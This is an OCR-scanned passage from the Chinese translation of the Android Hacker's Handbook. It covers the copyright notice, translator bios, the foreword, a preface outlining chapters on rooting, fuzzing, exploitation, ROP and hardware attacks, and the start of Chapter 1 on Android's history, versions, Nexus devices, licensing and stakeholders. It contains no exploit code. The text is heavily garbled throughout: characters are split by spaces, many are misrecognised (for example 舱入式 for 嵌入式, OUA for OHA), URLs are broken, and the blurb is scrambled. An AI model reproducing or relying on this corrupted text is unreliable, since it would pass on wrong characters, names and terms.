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效 字 有 版权 声明 


图 灵 社 区 的 电子 书 没有 采用 专 有 客 
户 端 ， 您 可 以 在 任意 设备 上 ， 用 自 
己 喜 欢 的 浏览 器 和 PDF 阅读 器 进行 
阅读 。 

但 您 购买 的 电子 书 仅 供 您 个 人 使 用 ， 
未 经 授权 ， 不 得 进行 传播 。 

我 们 愿意 相信 读者 具有 这 样 的 良知 
和 觉悟 ， 与 我 们 共同 保护 知识 产权 。 


如 果 购 买 者 有 侵权 行为 ， 我 们 可 能 
对 该 用 户 实 施 包括 但 不 限于 关闭 该 
帐号 等 维权 措施 ， 并 可 能 追究 法 律 
责任 。 


博士 ,清华 大 学 副 研 究 员 。 信 息 安全 领 
域 知 名 作 译 者 ， 原 创 《 网 络 攻防 技术 与 
实践 》《Metasploit 渗 透 测 试 魔鬼 训练 
营 》， 并 翻译 多 本 畅销 技术 书籍 。 蓝 莲 
花 战 队 领队 ， 带 领 战队 成 为 中 国 首 次 成 
功 问 入 DEFCON CTF 总 决赛 的 队伍 ， 
并 在 2014 年 获得 全 球 第 五 名 。 以 译 者 
稿费 支持 清华 大 学 电脑 传 爱 公益 行动 。 
新 浪 微 博 : @ 清 华 诸葛 建 伟 。 


清华 大 学 网 络 与 信息 安全 实验 室 在 读 博 
士 生 ， 监 莲花 战队 队长 ， 清 华 大 学 学 生 
网 络 安全 技术 协会 会 长 。 主 要 研究 软件 
安全 。 


Palo Alto Networks 高 级 研究 员 ， 主 要 方 
向 是 移动 平台 反 病 毒 和 软件 安全 。 
HITCON、XCON、ISC 等 会 议 讲 师 ， 看 
雪 论 坛 版 主 。 曾 发 现 和 分 析 了 Oldboot、 
WireLurker、CoolReaper 等 恶意 代码 ， 
向 十 余 家 互联 网 企业 报告 安全 漏洞 。 其 研 
究 成 果 获 得 全 球 1500 多 家 媒体 的 报道 
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本 书 由 世界 顶尖 级 黑客 打造 ， 是 目 





Android 系统 中 的 漏洞 挖掘 、 
是 一 本 难得 的 安全 指南 。 





内 容 提要 
前 最 全 面 的 一 本 Android 系统 安全 手册 。 书 中 细致 地 介绍 了 




















分 析 ， 并 给 出 了 大 量 利用 工具 ， 结 合 实例 从 白 帽 子 角度 分 析 了 诸多 系统 问题 ， 








本 书 的 目标 读者 为 软件 安全 技术 人 员 ， 操 作 系统 及 应 用 开发 人 员 。 
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“中 国 ” 和 “Android” 是 一 对 独特 的 组 合 。 近 几 年 来 ， 中 国 已 经 成 为 全 球 最 大 的 手机 市 场 ， 
与 此 同时 , Android 也 成 为 最 主流 的 智能 手机 操作 系统 。 但 是 两 者 的 联系 并 不 仅仅 体现 在 规模 上 。 
中 国 还 拥有 与 众 不 同 的 手机 产业 环境 , 许多 手机 厂商 专门 为 中 国 市 场 生 产 各 种 移动 设备 ,而 这 些 
设备 大 都 采用 Android 或 者 从 Android 原始 代码 衍生 而 来 的 操作 系统 。 此 外 ， 中 国 还 有 着 庞大 的 
安全 研究 社区 ， 并 且 产 出 了 许多 优秀 的 研究 成 果 ， 尤 其 是 在 移动 安全 领域 。 我 们 希望 4ndroid 
Packers Handbook 的 这 本 中 文 版 有 助 于 中 国 的 开发 者 和 研究 人 员 理解 关于 Android 平台 及 其 安 
全 特性 的 必 备 知识 。 















































China and Android are a unique combination. Over the last couple of years China has become the 
world’s largest mobile phone market while at the same time Android became the dominant smartphone 
operating system. But the combination of China and Android is not only about size. China has a unique 
mobile phone ecosystem with a number of mobile phone manufacturers that exclusively built devices for 
the Chinese market. Many of these devices run Android or operating systems that are derived from the 
original Android code. China also features a large security research community and is the source of a lot 
of good research, especially in the mobile space. With the Chinese translation of the Android Hacker’s 
Handbook we hope to provide developers and researchers with essential and easy accessible knowledge 
about the Android platform and its security features. 


Collin Mulliner 
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信息 安全 与 大 多 数 领域 一 样 ， 都 是 从 家 庭 式 手工 作坊 开始 萌芽 的 。 经 过 自主 发 展 ,， 这 一 领域 
已 经 跨越 了 业余 消遣 式 的 初级 阶段 ， 逐渐 成 为 一 个 健全 的 产业 。 如 今 的 信息 安全 领域 中 ,， 有 顶 着 
各 种 行政 头衔 的 大 佬 们 ,也 有 从 事 一 线 研 发 工作 的 牛人 们 ,还 有 来 自学 术 圈 的 “眼线 ” 们 。 这 也 
是 一 块 创新 热土 ， 能 够 让 数论 、 密 码 学 、 自 然 语 言 处 理 、 图 论 、 算 法 、 理 论 计算 机 科学 等 一 系列 
看 似 冷 俱 的 研究 方向 产生 重大 行业 影响 。 对 于 这 些 令 人 神往 的 科学 研究 而 言 , 信息 安全 行业 正在 
发 展 进化 成 为 它们 的 创新 试验 场 ， 但 与 此 同时 ， 信 息 安 全 (特别 是 “漏洞 研究 ”) 仍然 受信 息 技 
术 领 域 整体 发 展 的 限制 ， 并 与 信息 技术 领域 的 热点 趋势 保持 一 致 。 

正如 我 们 每 个 人 从 个 人 生活 中 强烈 感受 到 的 那样 , 移动 计算 显然 是 信息 技术 领域 近年 来 得 到 
巨大 发 展 的 一 个 热点 方向 。 现在, 各 种 移动 设备 已 经 无 时 无 刻 不 伴 随 在 我 们 的 左右 ,我们 花 在 移 
动 设备 上 的 时 间 要 比 花 在 电脑 上 的 时 间 多 得 多 : 办 公用 的 电脑 在 下 班 后 就 会 被 我 们 遗弃 在 办 公 
上 , 而 家 里 的 电脑 在 我 们 早上 急匆匆 去 上 班 时 其 至 没有 打开 的 机 会 ， 这 种 变化 是 前 所 未 有 的 。 与 
电脑 不 同 的 是 , 我 们 的 移动 设备 始终 是 保持 开机 的 , 而 且 连 接着 工作 与 家 庭 这 两 个 世界 ， 因 此 也 
成 为 了 坏人 们 眼中 更 具 价 值 的 攻击 目标 。 

不 幸 的 是 , 信息 安全 行业 适应 移动 化 趋势 的 脚步 有 些 述 组 ,近期 才刚 刚 跨 出 了 一 小 步 。 作 为 
一 个 “保守 派 ” 占 多 数 的 行业 , 信息 安全 领域 在 移动 与 舱 入 式 安全 研究 开发 上 的 行动 在 过 去 几 年 
里 过 于 缓慢 ( 至 少 公 开 层 面 上 是 这 样 的 ), 以 至 于 移动 安全 在 某 种 程度 上 仍然 被 认为 是 前 沿 研 究 ， 
因为 移动 设备 的 消费 者 与 用 户 最 近 才 开始 察觉 并 理解 日 常 使 用 移动 设备 所 面临 的 安全 威胁 。 这 些 
威胁 也 随 之 为 移动 安全 研究 与 安全 产品 创造 了 市 场 前 景 。 

对 于 信息 安全 领域 研究 者 而 言 ,移动 平台 就 像 是 一 块 新 大 陆 ， 等 待 着 人 们 去 探索 , 其 中 有 着 
各 种 处 理 器 架构 、 便 件 外 设 、 软 件 栈 和 操作 系统 所 构成 的 多 样 化 “地 理 结构 ”"， 它 们 共同 构成 了 
一 个 挖 气 、 利 用 和 研究 各 类 漏洞 的 生态 系统 。 

根据 IDC 的 统计 , Android 在 2012 年 第 三 季度 的 全 球 市 场 份额 是 75%( 以 当 季 出 货 量 计算 )， 
共 出 货 一 亿 三 千 六 百 万 部 。 苹 果 公司 的 iOS 在 当 季 的 市 场 份 额 为 14.9%， 黑 每 与 赛 班 则 分 别 以 
4.3% 和 2.3% 的 市 场 份额 被 甩 在 后 面 。 而 到 了 2013 年 第 三 季度 ,Android 的 市 场 份额 上 升 到 了 81%， 
iOS 下 降 至 12.9%， 剩 余 的 6.1% 则 分 散在 其 他 移动 操作 系统 中 。 在 这 样 的 市 场 份额 分 布 格局 下 ， 
Android 世界 中 有 着 一 系列 有 趣 的 信息 安全 事件 和 研究 工作 ， 我 们 觉得 一 本 能 够 描述 该 领域 本 质 
的 书籍 肯定 是 大 家 翘首 以 盼 的 。 

Wiley 出 版 社 已 经 出 版 了 Shellcoder’s、Mac、Database 、Web Application、iOS 和 Browser 等“ 黑 










































































































































































客 攻 防 技术 宝典 ”系列 图 书 "。《Android 安全 攻防 权威 指南 》 是 这 一 系列 的 最 新 图 书 ， 充 分 借助 
了 整个 系列 的 一 些 基础 信息 。 


本 书 及 相关 技术 概述 


我 们 决定 写 这 本 书 的 主要 原因 是 ,当前 移动 安全 研究 领域 的 知识 图 谱 过 于 稀 玖 , 仅 有 的 参考 
资源 和 技术 资料 互相 孤立 ， 其 至 是 相互 冲突 的 。 虽然 已 经 有 了 不 少 专注 于 Android 的 优秀 论文 和 
其 他 出 版 物 , 但 其 中 很 大 一 部 分 所 涵盖 的 内 容 都 非常 狭窄 ， 仅 仅 关 注 Android 安全 的 某 个 特定 方 
向 ,或 者 只 是 在 讨论 移动 或 钥 入 式 设备 的 某 个 安全 问题 时 将 Android 作为 一 个 辅助 例子 予以 提 及 。 
此 外 , Android 相关 的 已 公开 漏洞 信息 非常 稀缺 , 虽然 现在 已 经 有 超过 1000 个 已 公开 的 漏洞 会 影 
响 到 Android 设备 ,但 通过 常见 漏洞 信息 渠道 报告 的 只 有 不 到 100 个 。 我 们 相信 ， 本 书 所 介绍 的 
相关 技术 、 概 念 、 工 具 、 技 巧 和 案例 ， 可 以 帮助 你 迈 上 改善 Android 安全 产业 态势 的 漫漫 长 路 。 


本 书 的 结构 


本 书 应 该 按照 章节 顺序 进行 阅读 ， 但 是 对 于 正在 钻研 Android 或 者 进行 Android 设备 安全 研 
究 的 读者 来 说 ， 也 可 以 将 本 书 作为 一 本 参考 资料 。 本 书 一 共 分 为 13 章 ， 几 乎 涵盖 了 安全 研究 人 
员 第 一 次 接触 Android 所 需要 了 解 的 所 有 内 容 。 这 些 章节 通过 图 表 、 截 图 、 代 码 片 段 和 反 汇 编 代 
码 等 来 介绍 Android 的 软 硬 件 环境 ， 进 而 讨论 在 Android 上 进行 软件 漏洞 利用 和 逆向 工程 的 不 同 
之 处 。 全 书 的 大 致 结构 是 ， 从 一 些 宽 泛 的 话题 开始 ， 以 深度 的 技术 细节 收尾 。 这 些 章节 逐步 具体 
化 ， 最 终 将 讨论 一 些 安全 研究 的 高 级 话题 ， 如 发 现 、 分 析 和 攻击 Android 设备 。 本 书 尽 可 能 地 引 
用 来 自 外 部 的 各 类 详细 文档 ， 从 而 专注 于 阐述 设备 root、 逆 向 工程 、 漏 洞 研究 和 软件 漏洞 利用 等 
技术 细节 。 

口 第 1 章 介 绍 Android 移动 设备 的 生态 系统 。 首 先 回顾 Android 系统 发 展 的 历史 ， 然 后 介绍 
通用 软件 的 构成 、Android 设备 的 市 场 流通 情况 以 及 供应 链 当 中 的 各 大 关键 角色 ， 最 后 从 
较 高 层面 上 总 结 和 讨论 Android 生态 系统 发 展 遭 遇 的 挑战 以 及 安全 研究 面临 的 困难 。 

口 第 2 章 曾 述 Android 系统 的 基础 知识 。 首 先 引入 系统 安全 机 制 的 基础 核心 概念 , 然后 深入 
关键 安全 组 件 的 内 部 机 制 。 

口 第 3 章 介 绍 获取 Android 设备 完全 控制 权 的 动机 与 方法 。 首先 讲授 适用 于 众多 设备 的 通用 
技术 ， 而 后 逐一 详细 分 析 十 几 个 公开 的 漏洞 利用 。 

口 第 4 章 涉及 Android 应 用 相关 的 安全 概念 和 技术 。 讨 论 了 Android 应 用 开发 过 程 中 常见 的 
安全 错误 ， 并 介绍 如 何 使 用 正确 的 工具 和 流程 来 找到 这 些 问 题 。 

口 第 $ 章 讨论 移动 设备 可 能 遭受 攻击 的 形式 ， 并 解释 用 来 描述 这 些 攻击 的 关键 术语 。 
















































































































































































其 中 《黑客 攻防 技术 宝典 : 系统 实战 篇 》《 黑 客 攻防 技术 宝典 : Web 实战 篇 《黑客 攻防 技术 宝典 iOS 实战 篇 》 
已 由 人 民 邮 电 出 版 社 出 版 ,《 黑 客 攻 防 技术 宝典 : 浏览 器 实战 篇 》 亦 将 于 2015 年 面世 。 一 一 编者 注 
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口 第 6 章 讲述 如 何 使 用 模糊 测试 技术 来 发 现 Android 系统 中 的 软件 漏洞 。 从 介绍 模糊 测试 宏 
流程 人 手 , 重点 描述 如 何 使 用 这 些 流程 更 好 地 帮助 我 们 发 现 Android 系统 中 的 安全 问题 。 











中 不 同类 型 与 层次 代码 的 调试 技术 ,最 后 以 基于 WebKit 引 苟 的 浏览 器 中 一 个 未 修补 的 安 
全 问题 为 案例 进行 深入 分 析 。 

口 第 8 章 关 注 如 何 利 用 Android 设 备 中 发 现 的 内 存 破 坏 漏洞 ,涵盖 了 编译 器 和 操作 系统 的 内 部 

机 理 ， 例 如 堆 的 实现 、ARM 体系 架构 规范 等 。 章 节 最 后 详细 分 析 了 几 个 公开 的 漏洞 利用 。 

第 9 章 介绍 高 级 利用 技术 ROP (Return Oriented Programming )。 进 一 步 讲述 ARM 体系 架 

构 , 并 解释 为 何 、 如 何 使 用 ROP 技术 , 最 后 对 一 个 独特 的 漏洞 利用 作 了 更 为 细致 的 分 析 。 

口 第 10 章 深 入 Android 操作 系统 内 核 的 内 部 工作 原理 ， 涵 盖 如 何 从 黑客 的 角度 来 对 内 核 进 

行 开 发 和 调试 ， 本 章 最 后 还 会 教会 你 如 何 利 用 若干 已 公开 的 内 核 漏 洞 。 

口 第 11 章 将 带 你 返回 用 户 空间 ,来 讨论 一 个 特殊 且 重 要 的 Android 智能 手机 组 件 一 一 无 线 
接口 层 ( RIL ), 在 阐明 RIL 的 架构 细节 之 后 , 教 你 如 何 通 过 与 RIL 组件 的 交互 , 对 Android 
系统 中 处 理 短 消息 的 模块 进行 模糊 测试 。 

口 第 12 章 关注 目前 存在 于 Android 系统 中 的 安全 保护 机 制 ， 介 绍 了 这 些 保护 机 制 是 何 时 被 

发 明 并 引入 Android 系统 ， 以 及 是 如 何 运 作 的 ， 最 后 总 结 绕 过 这 些 保护 机 制 的 方法 。 

口 第 13 章 深 入 探索 通过 硬件 层面 来 攻击 Android 和 其 他 上 诅 人 式 设 备 的 方法 。 首 先 介绍 如 何 
识别 、 监 视 和 拦截 各 种 总 线 级 别 的 通信 ， 并 展示 如 何 利 用 这 些 方法 来 攻击 那些 难以 触及 
的 系统 组 件 。 最 后 给 出 了 如 何 避 免 遭 受 这 些 常 见 硬件 攻击 的 诀 窃 。 


本 书面 向 的 读者 


任何 想 要 加 深 对 Android 安全 认识 的 人 都 可 以 阅读 本 书 ， 不 管 是 软件 开发 者 、 艇 人 式 系统 设 
计 师 、 安 全 架构 师 ， 还 是 安全 研究 人 员 ， 本 书 都 会 帮助 你 拓宽 对 Android 安全 的 理解 。 
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尽管 Android 这 个 词 仍然 可 以 用 来 指 代 人 形 机 器 人 ,但 如 今 其 含义 已 经 远 比 十 年 前 丰富 ， 可 
以 用 于 许多 种 场景 中 。 在 移动 领域 中 ,， 它 既 可 以 指 公 司 、 操 作 系统 ,也 可 以 指 开源 项 目 和 开发 者 
社区 。 一 些 人 甚至 把 移动 设备 称 为 Android。 总 之 ， 现 在 围绕 着 这 个 非常 流行 的 移动 操作 系统 ， 
已 经 形成 了 一 个 完整 的 生态 圈 。 

本 章 将 仔细 审视 Android 生态 圈 的 构成 与 健康 状态 。 首 先 介 绍 Android 是 如 何 发 展 成 目前 的 
状态 的 ， 然 后 将 这 个 生态 圈 的 利益 相关 者 进行 分 组 ， 帮 助 读者 理解 他 们 的 角色 与 动机 。 最 后 本 章 
讨论 生态 圈 中 一 些 复杂 的 关联 关系 ， 它 们 会 造成 影响 安全 性 的 几 个 重要 问题 。 


1.1 了 解 Android 的 根源 


Android 并 不 是 一 夜 之 间 就 成 为 世界 上 最 流行 的 移动 操作 系统 的 。 过 去 十 年 , Android 走 过 了 
一 段 漫长 而 颠 艇 的 旅程 。 本 节 讲 述 Android 是 如 何 成 为 现在 的 样子 ， 并 开始 探究 到 底 是 什么 孕育 
了 Android 生态 圈 。 


1.1.1 公司 历史 


Android 是 从 一 家 名 为 Android 的 公司 开始 的 , 这 家 公司 于 2003 年 10 月 由 Andy Rubin Chris 
White Nick Sears 和 Rich Miner 创立 。 他 们 专注 于 创造 能 够 考虑 位 置信 息 和 用 户 偏好 的 移动 设备 。 
在 成 功 调查 市 场 需求 并 克服 资金 困难 之 后 ， 谷 歌 公 司 在 2005 年 8 月 收购 了 Android 公司 。 在 接 
下 来 的 一 段 时 间 里 ， 谷 歌 开始 与 硬件 、 软 件 和 电信 企业 建立 伙伴 关系 ， 意 图 进军 移动 市 场 。 

2007 年 11 月 ， 开 放手 机 联盟 ( OHA ) 宣告 成 立 。 这 个 企业 联盟 包括 了 以 谷歌 为 首 的 34 家 
创始 会 员 公司 ， 共 同 秉承 着 对 开放 性 的 承诺 。 此 外 ， 联 盟 的 目的 是 加 速 移动 平台 上 的 创新 ,为 消 
费 者 提供 更 丰富 、 更 便宜 和 更 好 用 的 移动 体验 。 在 本 书 出 版 时 ，OHA 会 员 已 经 增 至 84 个 。 联盟 会 
员 包 含 了 移动 生态 圈 的 所 有 重要 环节 ， 包 括 移动 运营 商 、 手 机 制造 商 、 芯 片 制造 商 和 软件 厂商 等 。 
你 可 以 在 OHA 的 网 站 上 找到 联盟 会 员 的 完整 列表 :www.openhandsetalliance.com/oha members.html。 

OHA 成 立 后 ， 谷 歌 宣布 了 他 们 的 第 一 款 移 动产 品 : Android。 但 谷歌 仍然 没有 向 市 场 发 布 任 
何 一 款 运行 Android 的 设备 。 最 终 经 过 5 年 之 后 , 在 2008 年 10 月, Android 终于 开始 进入 大 众 市 
场 ， 第 一 款 Android 手 机 HTC G1 的 公开 发 布 ， 标 志 着 一 个 新 时 代 的 开始 。 
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1.1.2 版 本 历史 


在 Android 第 一 个 商业 版 本 之 前 ，Android 操作 系统 有 过 Alpha 版 和 Beta 版 。 Alpha 版 只 提 
供给 谷歌 和 OHA 会 员 ， 以 流行 的 机 器 人 Astro Boy、Bender 和 R2-D2 作为 代号 。Android 的 Beta 
版 于 2007 年 11 月 5 日 发 布 ,这 天 也 被 普遍 视 为 Android 的 生日 。 

Android 第 一 个 商业 版 本 1.0 版 发 布 于 2008 年 9 月 23 日 , 1.1 版 在 2009 年 2 月 9 日 发 布 。 这 
两 个 版 本 在 发 布 时 没有 按 之 前 的 命名 约定 给 出 代号 。 而 从 2009 年 4 月 30 日 发 布 的 Android 1.5 
版 起 ，Android 主要 版 本 就 开始 按照 依 字母 排序 的 可 口 美食 来 命名 ，1.5 版 的 代号 为 Cupcake ( 纸 
杯 蛋 糕 )。 图 1-1 显示 了 所 有 的 Android 商业 版 本 ,包括 它们 的 发 布 时 间 和 代号 。 
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与 Android 发 行 版 以 代号 命名 类 似 ，Android 的 各 个 编译 链接 版 本 (build ) 通过 一 个 短 的 内 
部 构建 代号 进行 命名 ， 关 于 版 本 代号 名 称 、 标 签 和 内 部 版 本 号 的 详细 解释 ， 参 见 
http://source.android.com/source/build-numbers.html。 以 内 部 版 本 号 JOP40D 为 例 ， 首 字母 代表 
Android 发 行 版 的 代号 (J 代表 Jelly Bean )， 第 二 个 字母 代表 这 个 编译 链接 版 本 生成 的 代码 分 支 ， 
尽管 其 确切 含义 在 各 个 链接 版 本 中 都 并 非 固定 不 变 。 第 三 个 字母 和 随后 的 两 个 数字 组 成 了 一 个 日 
期 代码 ， 字 母 代 表 季 度 ， 从 A 开始 (A 代表 2009 年 第 一 季度 )。 在 这 个 例子 中 ，P 就 代表 2012 
年 第 四 季度 ， 两 个 数字 则 代表 从 本 季度 开始 的 天 数 。 在 该 例子 中 ，P40 就 是 2012 年 11 月 10 日 。 
最 后 一 个 字母 区 分 当日 发 布 的 不 同 版 本 ， 同 样 从 A 开始 。 某 天 的 第 一 个 编译 链接 版 本 应 该 以 A 
来 指明 ， 但 通常 不 会 使 用 这 个 字母 。 





































































































1.1.3 审视 Android 设备 家 族 


随 着 Android 的 成 长 ， 基 于 Android 操作 系统 的 设备 数量 也 随 之 增长 。 在 过 去 的 几 年 里 ， 
Android 已 经 缓慢 地 从 传统 的 智能 手机 和 平板 电脑 市 场 往外 扩张 , 进入 最 不 可 能 的 领域 中 。 例如 ， 
智能 手表 、 电 视 机 配件 、 游 戏 主机 、 烤 箱 、 发 送 到 太空 中 的 卫星 ， 以 及 新 的 Google Glass ( 具有 
头 戴 式 显示 屏 的 可 穿戴 设备 ) 等 设备 都 是 由 Android 系统 支持 的 。 汽 车 产业 也 开始 使 用 Android 
作为 车 辆 信息 娱乐 系统 。 这 款 操作 系统 也 开始 在 舱 入 式 Linux 领域 中 站 稳 脚 跟 ， 成 为 对 藤 入 式 开 
发 者 非常 有 吸引 力 的 替代 方案 。 所 有 这 些 都 将 让 Android 设备 家 族 成 为 一 个 非常 多 样 化 的 领域 。 
你 可 以 从 世界 各 地 的 零售 店 里 购买 到 Android 设备 。 目 前 ， 大 多 数 移动 用 户 通过 他 们 的 移动 
运营 商 获得 带 有 价格 补贴 的 设备 。 运 营 商 只 在 用 户 接受 语音 和 数据 服务 合约 的 条 件 下 , 为 用 户 提 
供 带 有 价格 补贴 的 设备 。 不 愿意 受 限于 某 一 个 运营 商 的 用 户 也 可 以 自己 从 消费 类 电子 产品 商店 或 
在 线 购 买 Android 设备 。 在 一 些 国家 , 谷歌 在 他 们 的 在 线 商店 Google Play 上 销售 Nexus 系列 产品 。 
1. 谷歌 Nexus 
Nexus 系列 是 谷歌 公司 智能 移动 设备 的 旗舰 系列 ， 产 品 主要 包括 智能 手机 和 平板 电脑 。 
台 设 备 都 是 由 不 同 的 与 谷歌 拥有 密切 伙伴 关系 的 原始 设备 制造 商 (OEM ) 所 生产 。 它 们 通过 
Google Play 在 线 商店 以 无 锁 版 形式 出 售 ， 非 常 方便 用 户 更 换 运 营 商 以 及 在 旅行 时 人 使用。 迄今， 
止 , 谷歌 已 与 HTC、 三 星 、LG 和 华硕 合作 生产 过 Nexus 智能 手机 和 平板 电脑 。 图 1-2 所 示 为 最 
近 几 年 发 布 的 一 些 Nexus 设备 。 

Nexus 设备 的 目的 是 为 新 的 Android 版 本 提供 一 个 参考 平台 ， 因 此 在 一 个 新 的 Android 版 本 
发 布 后 , 谷歌 会 很 快 自己 更 新 Nexus 设备 。 作 为 开发 者 的 开放 平台 , 这 些 设备 拥有 解锁 后 的 引导 
装载 程序 ， 从 而 允许 刷 上 定制 Android 编译 链接 版 本 ,并 且 得 到 Android 开源 项 目 ( AOSP ) 的 文 
持 。 谷 歌 也 提供 原 厂 ROM 镜像 ， 这 些 镜像 是 二 进 制 固 件 镜像 ， 可 以 将 设备 系统 刷 回 未 经 修改 的 
原始 状态 。 

Nexus 设备 的 另 一 个 好 处 是 ,它们 提供 了 纯粹 的 谷歌 体验 ， 这 意味 着 用 户 界面 没有 被 修改 过 
的 痕迹 ， 而 是 从 AOSP 编译 过 来 原 厂 Android 中 的 用 户 接 口 。Nexus 设备 中 也 带 有 一 些 谷 歌 专 有 
应 用 ， 比 如 Google Now、Gmail、Google Play、Google Drive 和 Hangouts 等 。 
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2. 市 场 份额 


图 1-2 


谷歌 Nexus 设备 





智能 手机 市 场 份额 的 统计 数据 往往 因数 据 源 而 异 。 数 据 源 有 很 多 ， 其 中 包括 ComScore、 
Kantar IDC 和 Strategy Analytics 等 。 通 过 对 这 些 数据 源 的 统计 数据 进行 全 面 观察 ,会 发 现 Android 
的 市 场 份额 在 大 多 数 国家 中 都 呈 增 长 态势 。 根 据 一 份 由 Goldman Sachs 发 布 的 报告 ，Android 在 
2012 年 年 末 的 全 球 计 算 市 场 上 处 于 首位 。StatCounter 公司 发 布 的 GlobalStats 报告 ( http://gs. 
statcounter.com/ ) 显 示 , Android 在 2013 年 11 月 在 移动 操作 系统 市 场 中 排名 第 一 ,拥有 全 球 41.3% 
的 市 场 占有 率 。 尽 管 存在 着 一 些 细微 的 差异 , 但 是 所 有 的 数据 源 看 起 来 都 认同 Android 目前 正在 








统治 移动 操作 系统 市 场 。 
3. 发 行 版 的 采纳 
































并 不 是 所 有 Android 设备 上 都 运行 着 相同 的 Android 版 本 。 谷 歌 定期 发 布 一 个 统计 报表 

















( dashboard ), 给 出 运行 每 个 Android 版 本 的 设备 所 占 的 相对 百分比 。 这 些 信 息 是 基于 访问 Google 
Play 的 日 志 收 集 统 计 的 ， 而 Google Play 则 在 所 有 经 过 批准 的 设备 中 都 存在 。 要 了 解 最 新 的 统计 








报表 , 可 访问 链接 : http://developer.android.com/about/dashboards/。 此 外 维基 百科 也 包含 了 一 个 图 











表 ， 能 够 显示 在 一 定时 期 内 汇总 的 统计 数据 。 图 1-3 显示 了 撰写 本 书 时 的 最 新 图 表 ， 其 中 包含 了 


从 2009 年 12 月 至 2013 年 2 





月 的 数据 。 




















如 图 1-3 所 示 ，Android 的 新 版 本 有 着 一 个 相对 缓慢 的 采纳 周期 ， 需 要 超过 一 年 的 时 间 才 能 
让 一 个 新 版 本 在 90% 以 上 的 设备 上 运行 。 你 可 以 在 1.3 节 中 阅读 到 关于 这 一 问题 的 更 多 细节 ， 以 
及 Android 所 面临 的 更 多 其 他 挑战 。 











1.1 了 解 Android 的 根源 
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ttp://en.wikipedia.org/wikiPFile:Android_historical_version_distribution.png 


图 1-3 Android 版 本 分 布 的 历史 情况 


1.1.4 主体 开源 


AOSP 是 谷歌 和 手机 开放 联盟 (OUA ) 其 他 会 员 对 开放 性 承诺 的 表现 形式 。 作 为 AOSP 的 基 
石 , Android 操作 系统 是 构建 于 许多 不 同 开放 源 代码 项 目 组 件 之 上 的 ,其 中 包含 许多 程序 库 、Linux 
内 核 、 一 个 完整 的 用 户 接口 和 一 些 应 用 程序 等 。 所 有 这 些 软件 组 件 都 拥有 开放 源 代 人 码 倡议 (OSI ) 
所 认证 的 版 本 许可 协议 。 大 多 数 Android 的 源码 是 基于 Apache 软件 许可 协议 V2.0 版 本 而 发 布 的 ， 
你 可 以 通过 http:/www.apache.orgylicensesLICENSE-2.0 获 取 到 这 份 协议 条 款 。 但 是 也 存在 着 一 些 
例外 情况 , 主要 包括 一 些 上 游 项 目 , 是 Android 所 依赖 的 一 些 外 部 开源 项 目 。 两 个 例子 是 以 GPLv2 
软件 许可 协议 发 布 的 Linux 内 核 代码 ， 以 及 使 用 BSD 族 软件 许可 协议 的 WebKit 项 目 。AOSP 源 
代码 库 将 所 有 这 些 项 目 都 聚集 在 一 处 。 

尽管 Android 软件 栈 的 绝 大 部 分 是 开源 的 , 但 是 最 终 的 消费 设备 中 会 包含 多 个 封闭 源 代码 的 
软件 组 件 。 甚 至 谷歌 官方 的 旗舰 产品 线 Nexus 系列 设备 中 也 包含 着 专 有 的 二 进 制 软件 。 例子 包括 
引导 装载 程序 、 外 设 固件 、 无 线 电 组 件 、 数 字 权 限 管理 ( DRM ) 软件 和 一 些 应 用 程序 。 许 多 软 
件 仍 然 保 持 封闭 源 代码 ， 以 努力 保护 知识 产权 。 然 而 , 保持 它们 封闭 源 代码 也 阻碍 软件 的 互联 互 
通 ， 使 得 开发 社区 的 移植 工作 更 具 挑 战 性 。 

此 外 ， 许 多 尝试 参与 Android 代码 开发 的 开源 爱好 者 发 现 ，Android 并 不 是 完全 开放 式 地 开 
发 。 有 证 据 表 明 ， 谷歌 开发 Android 很 大 程度 上 是 以 秘密 的 方式 进行 的 。 代 码 更 改 不 会 马上 提供 
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给 公众 , 与 之 相反 ,开源 发 布 伴随 着 新 版 本 发 布 进行 。 但 尽管 这 样 ,好 几 次 开源 代码 也 并 没有 在 
发 布 时 公开 。 事实 上 ，Android 的 Honeycomb 版 本 (3.0 ) 的 源 代 码 直 到 Ice Cream Sandwich ( 4.0 ) 
源 代码 发 布 后 才 最 终 公 布 ， 男 外 ，Ice Cream Sandwich 的 源 代码 直到 版 本 发 布 差不多 一 个 月 之 后 
才 公 开 。 像 这 样 的 事件 不 仅 违 背 了 开放 源 代 码 的 精神 ， 也 违背 了 Android 的 两 个 既定 目标 : 创新 
性 和 开放 性 。 


1.2 了 解 Android 的 利益 相关 者 


了 解 Android 生态 圈 中 到 底 有 哪些 利益 相关 者 是 非常 重要 的 ， 这 不 但 可 以 提供 不 同 的 视角 ， 
还 可 以 让 人 们 理解 谁 负责 开发 支持 不 同 组 件 的 代码 。 本 节 将 审视 主要 的 Android 利益 相关 者 群体 ， 
包括 谷歌 、 硬 件 厂商 、 移 动 通信 运营 商 、 开 发 者 、 用 户 和 安全 研究 人 员 ， 探 讨 每 类 利益 相关 者 的 
目的 与 动机 ， 并 分 析 他 们 是 如 何 相 互 关联 的 。 

每 个 群体 都 属于 一 种 不 同 的 产业 领域 , 在 Android 生态 圈 中 承担 着 不 同 的 角色 。 谷 歌 推动 了 
Android 的 诞生 ， 开 发 核心 的 操作 系统 ， 并 管理 Android 品牌 。 硬 件 加 工厂 商 制造 了 底层 的 硬件 
部 件 与 外 于 设备 。 原 始 设备 制造 商 (OEM ) 则 制造 了 终端 用 户 设 备 ， 将 不 同 的 部 件 组 装 在 一 起 ， 
进而 形成 完整 的 设备 。 移 动 通信 运营 商 为 移动 设备 提供 了 语音 和 数据 访问 服务 。 一 大 批 开发 者 ， 
包括 那些 被 其 他 群体 雇用 的 程序 员 ， 在 众多 项 目 中 一 起 工作 ， 共 同 塑 造 着 Android 生态 圈 。 

图 1-4 显示 了 Android 生态 圈 主 要 利益 相关 者 群体 之 间 的 关系 。 









































































































































谷歌 所 有 层次 
系统 芯片 制造 商 内 核 、 无 线 电 
所 有 层次 
i 应 用 、 引 导 装 载 程 
移动 通信 运营 商 序 和 无 线 电 规范 








图 1-4 生态 圈 关 联 关系 





这 些 关 系 表明 了 在 制造 或 升级 一 个 Android 设备 时 各 方 的 关联 情况 。 正 如 图 1-4 所 清晰 显示 
出 的 ，Android 生态 圈 非 常 复 杂 。 这 些 业务 关系 极 难 管 理 ， 同 时 还 会 变 得 更 加 复杂 。 关 于 这 一 点 ， 
本 章 稍 后 再 进行 讨论 。 在 研究 这 些 问 题 之 前 ， 先 来 详细 讨论 每 一 个 群体 。 
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1.2.1 谷歌 


作为 将 Android 引入 市 场 的 公司 ,谷歌 在 该 生态 圈 中 拥有 儿 个 关键 角色 。 它 的 责任 包括 法 务 
